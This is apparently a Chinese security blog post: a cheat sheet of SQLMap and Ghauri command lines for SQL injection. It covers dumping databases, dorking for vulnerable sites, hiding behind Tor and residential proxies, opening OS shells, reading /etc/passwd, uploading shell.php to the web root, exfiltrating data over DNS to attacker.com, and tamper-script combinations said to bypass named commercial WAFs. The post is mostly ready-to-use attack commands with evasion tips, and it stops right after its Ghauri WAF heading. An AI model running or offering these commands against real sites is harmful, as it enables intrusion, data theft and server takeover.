

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/admin.jpg">
  <link rel="icon" href="/img/admin.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="xiaobite">
  <meta name="keywords" content="">
  
    <meta name="description" content="Sqlmap基本命令SQLMap 采用模块化命令结构。以下是最常见的操作： 基本目标扫描对单个 GET 参数执行初始 SQL 注入测试，并枚举可用数据库。 1sqlmap -u &quot;vulnerable_url&quot; --dbs --batch  通过请求文件测试（适用于 POST&#x2F;Headers）使用从 Burp 或类似工具捕获的原始 HTTP 请求来测试 POST bo">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqlmap-Ghauri">
<meta property="og:url" content="https://xiaobite-hacker.github.io/2026/02/22/SQLMap-Ghauri/index.html">
<meta property="og:site_name" content="xiaobite">
<meta property="og:description" content="Sqlmap基本命令SQLMap 采用模块化命令结构。以下是最常见的操作： 基本目标扫描对单个 GET 参数执行初始 SQL 注入测试，并枚举可用数据库。 1sqlmap -u &quot;vulnerable_url&quot; --dbs --batch  通过请求文件测试（适用于 POST&#x2F;Headers）使用从 Burp 或类似工具捕获的原始 HTTP 请求来测试 POST bo">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-02-22T06:09:24.000Z">
<meta property="article:modified_time" content="2026-04-24T07:24:20.713Z">
<meta property="article:author" content="xiaobite">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>Sqlmap-Ghauri - xiaobite</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"xiaobite-hacker.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>xiaobite</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/prompt/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>prompt</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Sqlmap-Ghauri"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-02-22 14:09" pubdate>
          2026年2月22日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          26 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Sqlmap-Ghauri</h1>
            
            
              <div class="markdown-body">
                
                <h4 id="Sqlmap基本命令"><a href="#Sqlmap基本命令" class="headerlink" title="Sqlmap基本命令"></a>Sqlmap基本命令</h4><p>SQLMap 采用模块化命令结构。以下是最常见的操作：</p>
<h4 id="基本目标扫描"><a href="#基本目标扫描" class="headerlink" title="基本目标扫描"></a>基本目标扫描</h4><p>对单个 GET 参数执行初始 SQL 注入测试，并枚举可用数据库。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -u <span class="hljs-string">&quot;vulnerable_url&quot;</span> --dbs --batch<br></code></pre></td></tr></table></figure>

<h4 id="通过请求文件测试（适用于-POST-Headers）"><a href="#通过请求文件测试（适用于-POST-Headers）" class="headerlink" title="通过请求文件测试（适用于 POST&#x2F;Headers）"></a>通过请求文件测试（适用于 POST&#x2F;Headers）</h4><p>使用从 Burp 或类似工具捕获的原始 HTTP 请求来测试 POST body、Headers、Cookies、JSON 和复杂的 API 请求。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -r request.txt --level 5 --risk 3 --batch --dbs<br></code></pre></td></tr></table></figure>

<h4 id="使用-Dorking-方法"><a href="#使用-Dorking-方法" class="headerlink" title="使用 Dorking 方法"></a>使用 Dorking 方法</h4><p>直接从搜索引擎搜索易受攻击的 URL 并自动测试。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -g <span class="hljs-string">&#x27;site:target.com inurl:\&quot;.php?id=1\&quot;&#x27;</span><br></code></pre></td></tr></table></figure>

<h4 id="批量-URL-扫描"><a href="#批量-URL-扫描" class="headerlink" title="批量 URL 扫描"></a>批量 URL 扫描</h4><p>在单次自动化运行中扫描文本文件中列出的多个目标 URL，无需逐一手动测试每个目标。</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs dts"><span class="hljs-symbol">http:</span><span class="hljs-comment">//testphp.vulnweb.com/search.php?limit=100</span><br><span class="hljs-symbol">http:</span><span class="hljs-comment">//testphp.vulnweb.com/search.php?order=order&amp;query=query</span><br><span class="hljs-symbol">http:</span><span class="hljs-comment">//testphp.vulnweb.com/search?q=aaa</span><br><span class="hljs-symbol">http:</span><span class="hljs-comment">//testphp.vulnweb.com/showimage.php?file=aa</span><br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -m urls.txt --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbs<br></code></pre></td></tr></table></figure>

<h4 id="Tor-模式"><a href="#Tor-模式" class="headerlink" title="Tor 模式"></a>Tor 模式</h4><p>通过 Tor 网络路由所有流量，隐藏真实 IP 并规避基于 IP 的封锁或速率限制。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --dbs --batch<br></code></pre></td></tr></table></figure>

<h4 id="Burp-模式"><a href="#Burp-模式" class="headerlink" title="Burp 模式"></a>Burp 模式</h4><p>将所有 SQLMap 流量通过 Burp Suite 发送，以便进行检查、手动篡改和 WAF 行为分析。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -r request.txt --level 3 --risk 2 --random-agent --time-sec=30 --proxy https://127.0.0.1:8080 --thread=10 --dbs --hostname --curent-user --current-db<br></code></pre></td></tr></table></figure>

<h4 id="基于-JSON-的-SQL-注入"><a href="#基于-JSON-的-SQL-注入" class="headerlink" title="基于 JSON 的 SQL 注入"></a>基于 JSON 的 SQL 注入</h4><p>检测 JSON 请求正文中的 SQL 注入，使用 hex 编码的 payload，并在 API 网关返回 403 Forbidden 响应时继续测试。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --data <span class="hljs-string">&#x27;&#123;&quot;User&quot;:&quot;admin&quot;,&quot;Pwd&quot;:&quot;admin@123&quot;&#125;&#x27;</span> --random-agent --ignore-code 403 --dbs --hex<br></code></pre></td></tr></table></figure>

<h4 id="数据库枚举"><a href="#数据库枚举" class="headerlink" title="数据库枚举"></a>数据库枚举</h4><p>这些选项让你系统地探索数据库结构，从列出数据库到提取特定的表、列和数据。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">--dbs                                          <span class="hljs-comment"># 列出目标上所有可用的数据库。</span><br>-D database_name --tables                       <span class="hljs-comment"># 列出指定数据库中的所有表。</span><br>-D database_name -T table_name --columns        <span class="hljs-comment"># 列出指定表中的所有列。</span><br>-D database_name -T table_name -C col1,col2 --dump  <span class="hljs-comment"># 仅转储表中选定的列。</span><br></code></pre></td></tr></table></figure>

<h4 id="高级数据提取"><a href="#高级数据提取" class="headerlink" title="高级数据提取"></a>高级数据提取</h4><p>这些选项帮助高效地提取大量数据，同时避免转储过程中常见的过滤和编码问题。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">--dump-all    <span class="hljs-comment"># 一次性转储所有数据库、表和数据。</span><br>--threads=10  <span class="hljs-comment"># 使用 10 个并行线程加速攻击。</span><br>--hex         <span class="hljs-comment"># 将检索到的数据编码为 hex，绕过过滤器并避免编码问题。</span><br>--no-cast     <span class="hljs-comment"># 禁用数据类型转换，防止提取过程中的数据库转换错误。</span><br></code></pre></td></tr></table></figure>

<h4 id="认证与会话处理"><a href="#认证与会话处理" class="headerlink" title="认证与会话处理"></a>认证与会话处理</h4><p>这些选项使 SQLMap 能够处理已认证会话、自定义 Headers 和 CSRF 保护的表单，同时降低被检测的几率。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">--cookie=<span class="hljs-string">&quot;PHPSESSID=...&quot;</span>                     <span class="hljs-comment"># 发送会话 Cookie 以保持认证状态。</span><br>--headers=<span class="hljs-string">&quot;X-Forwarded-For: 127.0.0.1&quot;</span>      <span class="hljs-comment"># 添加自定义 HTTP Headers（可伪造 IP 或绕过 WAF 规则）。</span><br>--csrf-token=token                           <span class="hljs-comment"># 通过提取和重用 Token 来处理 CSRF 保护的表单。</span><br>--random-agent                               <span class="hljs-comment"># 每次请求随机化 User-Agent 以避免检测。</span><br></code></pre></td></tr></table></figure>

<h4 id="操作系统与文件系统访问"><a href="#操作系统与文件系统访问" class="headerlink" title="操作系统与文件系统访问"></a>操作系统与文件系统访问</h4><p>这些选项展示了如何将 SQL 注入用于后渗透，允许文件访问以及在某些情况下在底层服务器上执行命令。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">--os-shell                                              <span class="hljs-comment"># 尝试在目标操作系统上打开交互式命令 Shell。</span><br>--os-pwn                                                <span class="hljs-comment"># 使用高级利用方法尝试完全接管系统。</span><br>--file-read=/etc/passwd                                 <span class="hljs-comment"># 从目标服务器读取文件。</span><br>--file-write=shell.php --file-dest=/var/www/html/shell.php  <span class="hljs-comment"># 将本地文件上传到服务器上的指定路径。</span><br></code></pre></td></tr></table></figure>

<h4 id="带外注入与-DNS-数据外传"><a href="#带外注入与-DNS-数据外传" class="headerlink" title="带外注入与 DNS 数据外传"></a>带外注入与 DNS 数据外传</h4><p>这些选项使用 DNS 或 HTTP 等外部通道，在带内响应不可用时确认和提取盲注 SQL 注入的数据。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">--dns-domain=attacker.com       <span class="hljs-comment"># 使用自定义 DNS 域名进行带外数据外传和盲注 SQLi 检查。</span><br>--os-shell --technique=O        <span class="hljs-comment"># 仅使用带外（DNS/HTTP）注入技术尝试获取操作系统命令 Shell。</span><br></code></pre></td></tr></table></figure>

<h4 id="Header-利用"><a href="#Header-利用" class="headerlink" title="Header 利用"></a>Header 利用</h4><p>这些选项操纵 HTTP Headers、请求方法和参数格式，以绕过代理、WAF 规则或不寻常的请求处理逻辑。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">--headers=<span class="hljs-string">&quot;X-Original-URL: /vuln.php&quot;</span>   <span class="hljs-comment"># 发送自定义 Header，常用于绕过反向代理或 WAF 路由规则。</span><br>--method=PUT                             <span class="hljs-comment"># 强制 HTTP 请求方法为 PUT 而非 GET/POST。</span><br>--param-del=<span class="hljs-string">&quot;;&quot;</span>                          <span class="hljs-comment"># 当目标使用 &#x27;;&#x27; 分隔参数时，设置自定义参数分隔符。</span><br></code></pre></td></tr></table></figure>

<h4 id="时间与速率规避"><a href="#时间与速率规避" class="headerlink" title="时间与速率规避"></a>时间与速率规避</h4><p>这些选项减慢请求速度并降低噪音，帮助 SQLMap 在保持可靠性的同时避免速率限制和行为检测。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">--delay=5      <span class="hljs-comment"># 每次请求之间等待 5 秒以保持隐蔽性。</span><br>--<span class="hljs-built_in">timeout</span>=20   <span class="hljs-comment"># 设置服务器响应的最大等待时间为 20 秒。</span><br>--retries=5    <span class="hljs-comment"># 失败的请求最多重试 5 次。</span><br>--threads=1    <span class="hljs-comment"># 使用单线程进行低速、低噪音扫描。</span><br></code></pre></td></tr></table></figure>

<h4 id="表单中的-SQL-注入"><a href="#表单中的-SQL-注入" class="headerlink" title="表单中的 SQL 注入"></a>表单中的 SQL 注入</h4><p>此方法使用 SQLMap 通过爬取页面并分析所有检测到的字段，自动查找和测试表单输入中的 SQL 注入。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -u https://target.com/registration --dbs --forms --crawl=2 --batch<br></code></pre></td></tr></table></figure>

<h3 id="SQLMap-WAF-绕过与规避技术"><a href="#SQLMap-WAF-绕过与规避技术" class="headerlink" title="SQLMap WAF 绕过与规避技术"></a>SQLMap WAF 绕过与规避技术</h3><p>现代 WAF（Cloudflare、Akamai 等）分析的是请求模式和 payload 行为，而不仅仅是特定关键词。为了规避这些检测，tamper 脚本被用于在发送前动态修改 SQL payload，改变其结构、编码和语法以绕过过滤规则。</p>
<h4 id="忽略被阻止的-HTTP-状态码"><a href="#忽略被阻止的-HTTP-状态码" class="headerlink" title="忽略被阻止的 HTTP 状态码"></a>忽略被阻止的 HTTP 状态码</h4><p>忽略被阻止的 HTTP 状态码。如果 WAF 返回 403 或 500，可配置 SQLMap 忽略这些状态码并继续测试。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -r request.txt --level=5 --risk=3 --no-cast --force-ssl --ignore-code=500 --dbs<br></code></pre></td></tr></table></figure>

<h4 id="Imperva-Incapsula-WAF-绕过"><a href="#Imperva-Incapsula-WAF-绕过" class="headerlink" title="Imperva &#x2F; Incapsula WAF 绕过"></a>Imperva &#x2F; Incapsula WAF 绕过</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --risk 3 --level 5 --dbs --tamper=space2comment,space2morehash<br></code></pre></td></tr></table></figure>

<h4 id="ModSecurity-WAF-绕过"><a href="#ModSecurity-WAF-绕过" class="headerlink" title="ModSecurity WAF 绕过"></a>ModSecurity WAF 绕过</h4><p>使用如下 tamper 脚本配合随机 User-Agent、延迟和编码来打破正则模式，使 payload 悄然通过 ModSecurity 过滤器。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">proxychains sqlmap -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --random-agent --batch --dbs --level 3 --tamper=between,space2comment --hex --delay 5<br><br>sqlmap -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --dbs --random-agent --keep-alive --threads=5 --no-cast --tamper=modsecurityversioned,space2comment --batch --level 3<br></code></pre></td></tr></table></figure>

<h4 id="Cloudflare-WAF-绕过"><a href="#Cloudflare-WAF-绕过" class="headerlink" title="Cloudflare WAF 绕过"></a>Cloudflare WAF 绕过</h4><p>通过随机大小写、编码和内联注释篡改来打破关键词模式，规避 Cloudflare 的签名检查。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --batch --dbs --threads=5 --random-agent --risk=3 --level=5 --tamper=space2comment -v 3 --dbms=MySQL<br><br>sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash<br><br>sqlmap -u <span class="hljs-string">&quot;vulnerable_url&quot;</span> --tamper=space2comment,randomcase,charencode --level 5 --risk 3 --batch --dbs<br><br>proxychains sqlmap -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --dbs --batch -p <span class="hljs-built_in">id</span> --random-agent --tamper=between,space2comment --dbms mysql --tech=B --no-cast --flush-session --threads 10<br></code></pre></td></tr></table></figure>

<p>📝 注意：不要一次使用过多 tamper 脚本。这会使 payload 过长，触发 WAF 封锁，导致冲突、误报并拖慢扫描速度。只使用必要的脚本，且最多不超过 3 个。</p>
<h4 id="SQLMap-WAF-绕过技巧（亲测有效）"><a href="#SQLMap-WAF-绕过技巧（亲测有效）" class="headerlink" title="SQLMap WAF 绕过技巧（亲测有效）"></a>SQLMap WAF 绕过技巧（亲测有效）</h4><ul>
<li>使用 <code>--tamper</code> 配合一个或多个脚本（逗号分隔）来混淆 payload 并规避基于签名的规则。常用且有效的组合包括：</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash">--tamper=between,randomcase,space2comment                  <span class="hljs-comment"># 对 ModSecurity、Cloudflare、F5 ASM 有效</span><br>--tamper=space2comment,space2morehash                      <span class="hljs-comment"># 对 ModSecurity、Imperva SecureSphere 有效</span><br>--tamper=modsecurityversioned,space2comment                <span class="hljs-comment"># 对 ModSecurity、Comodo WAF 有效</span><br>--tamper=space2comment,between,randomcase,charencode       <span class="hljs-comment"># 对 Cloudflare、Akamai、Sucuri 有效</span><br>--tamper=space2comment,randomcase,unmagicquotes            <span class="hljs-comment"># 对 PHP WAFs、Wordfence、LiteSpeed 有效</span><br>--tamper=space2comment,between,percentage                  <span class="hljs-comment"># 对 Imperva、Barracuda 有效</span><br>--tamper=charencode,randomcase,space2comment               <span class="hljs-comment"># 对 Cloudflare、F5 ASM、Radware 有效</span><br>--tamper=space2plus,space2comment,randomcase               <span class="hljs-comment"># 对 Akamai、Sucuri、StackPath 有效</span><br>--tamper=between,space2comment,modsecurityzeroversioned    <span class="hljs-comment"># 对 ModSecurity、Comodo 有效</span><br>--tamper=space2comment,randomcase,apostrophemask           <span class="hljs-comment"># 对 Imperva、Cloudflare 有效</span><br>--tamper=charunicodeencode,space2comment,randomcase        <span class="hljs-comment"># 对 Akamai、Radware、Azure WAF 有效</span><br>--tamper=space2comment,between,randomcase,bluecoat         <span class="hljs-comment"># 对 BlueCoat / Symantec WAF 有效</span><br>--tamper=space2comment,between,randomcase,equaltolike      <span class="hljs-comment"># 对 F5 ASM、Citrix NetScaler 有效</span><br>--tamper=space2comment,randomcase,overlongutf8             <span class="hljs-comment"># 对 FortiWeb、旧版 ModSecurity 规则 有效</span><br></code></pre></td></tr></table></figure>

<ul>
<li>使用 <code>--ignore-code=401,403</code>（或其他封锁状态码）使 SQLMap 在 WAF 干预时不中断。</li>
<li>使用 <code>proxychains</code> + 住宅代理轮换 IP 并模拟合法流量，住宅 IP 通常比数据中心 IP 更能有效规避基于信誉的 WAF 封锁。</li>
<li>当你已知或已识别后端 DBMS 时，使用 <code>--dbms mysql</code>（或 postgresql、mssql 等），这将强制 SQLMap 使用针对特定数据库引擎的 payload，使检测更困难，结果更快更精确。</li>
<li>结合 <code>--risk 2</code>（或仅在真正需要时使用 <code>--risk 3</code>）与适中的 <code>--level</code>，在基本 payload 失败时使用更强的 payload。尽量避免使用 <code>--risk 3</code>，因为它更具攻击性，可能导致目标系统不稳定或产生意外影响。</li>
<li>在处理过滤问题或编码问题时使用 <code>--hex</code>，它强制 SQLMap 以十六进制形式发送数据，有助于绕过输入验证和某些 WAF 规则。</li>
<li>使用 <code>--null-connection</code> 以最小响应数据测试注入并减少 WAF 检测，启用 <code>--keep-alive</code> 以复用同一 TCP 连接，这看起来更像正常浏览器流量，有助于避免基于行为的封锁。</li>
<li>当类型转换导致 payload 失效时使用 <code>--no-cast</code>。它避免 CAST 操作，在数据提取困难或不稳定时很有帮助。</li>
</ul>
<h3 id="Ghauri：进阶替代方案"><a href="#Ghauri：进阶替代方案" class="headerlink" title="Ghauri：进阶替代方案"></a>Ghauri：进阶替代方案</h3><p>虽然 SQLMap 是行业标准，但 Ghauri 是一个高级 SQL 注入利用框架，针对盲注、时间注入和受 WAF 保护的目标进行了优化。它在面对现代重度 JavaScript 应用、REST API 和云端 WAF（传统 payload 模式被严格过滤）时尤为有效。</p>
<h4 id="核心优势："><a href="#核心优势：" class="headerlink" title="核心优势："></a>核心优势：</h4><ul>
<li>先进的时间盲注和布尔盲注自适应能力。</li>
<li>为速度优化的清晰模块化架构。</li>
<li>面对云端 WAF（Cloudflare、Akamai）时表现出色。</li>
<li>内置模拟人类行为的 payload 混淆。</li>
</ul>
<p>其引擎针对异步请求和自适应延迟校准进行了优化，使其在隐蔽利用方面非常高效。</p>
<h4 id="Ghauri-基本命令"><a href="#Ghauri-基本命令" class="headerlink" title="Ghauri 基本命令"></a>Ghauri 基本命令</h4><p>Ghauri 的命令与 SQLMap 非常相似，因此很容易切换使用。</p>
<h4 id="基本扫描"><a href="#基本扫描" class="headerlink" title="基本扫描"></a>基本扫描</h4><p>始终从基本扫描开始。先使用这个简单命令测试单个 GET 参数的 SQL 注入并枚举可用数据库。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ghauri -u <span class="hljs-string">&quot;vulnerable_url&quot;</span> --dbs --batch<br></code></pre></td></tr></table></figure>

<h4 id="通过请求文件测试（适用于-POST-Headers）-1"><a href="#通过请求文件测试（适用于-POST-Headers）-1" class="headerlink" title="通过请求文件测试（适用于 POST&#x2F;Headers）"></a>通过请求文件测试（适用于 POST&#x2F;Headers）</h4><p>使用 Burp 请求文件进行更深入的测试。它让你在单次运行中扫描 POST 数据、Cookies、自定义 Headers 和 API 参数。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ghauri -r request.txt -p txt_user_id --dbs --batch --level 3<br></code></pre></td></tr></table></figure>

<h4 id="批量-URL-扫描-1"><a href="#批量-URL-扫描-1" class="headerlink" title="批量 URL 扫描"></a>批量 URL 扫描</h4><p>在单次自动化运行中扫描文本文件中列出的多个目标 URL，无需逐一手动测试每个目标。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ghauri -m urls.txt --batch --dbs --level 3 --threads 10<br></code></pre></td></tr></table></figure>

<h4 id="JSON-与-API-目标"><a href="#JSON-与-API-目标" class="headerlink" title="JSON 与 API 目标"></a>JSON 与 API 目标</h4><p>对于 JSON POST 注入，使用 <code>--data</code> 标志传入 JSON body 运行 Ghauri。这通常比使用 Burp 请求文件效果更好。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ghauri -u <span class="hljs-string">&#x27;vulnerable_url&#x27;</span> --data <span class="hljs-string">&#x27;&#123;&quot;User&quot;:&quot;test&quot;,&quot;Pwd&quot;:&quot;test@123&quot;&#125;&#x27;</span> --random-agent --dbs --level 3 --batch<br></code></pre></td></tr></table></figure>

<h3 id="Ghauri-WAF-绕过与规避技术"><a href="#Ghauri-WAF-绕过与规避技术" class="headerlink" title="Ghauri WAF 绕过与规避技术"></a>Ghauri WAF 绕过与规避技术</h3><p>Ghauri 智能地调整其推理技术并混淆 payload，使其看起来像正常的用户流量，从而更容易绕过 WAF 和其他安全防御。以下是一些在处理 WAF 绕过时始终对我有帮助的命令。</p>
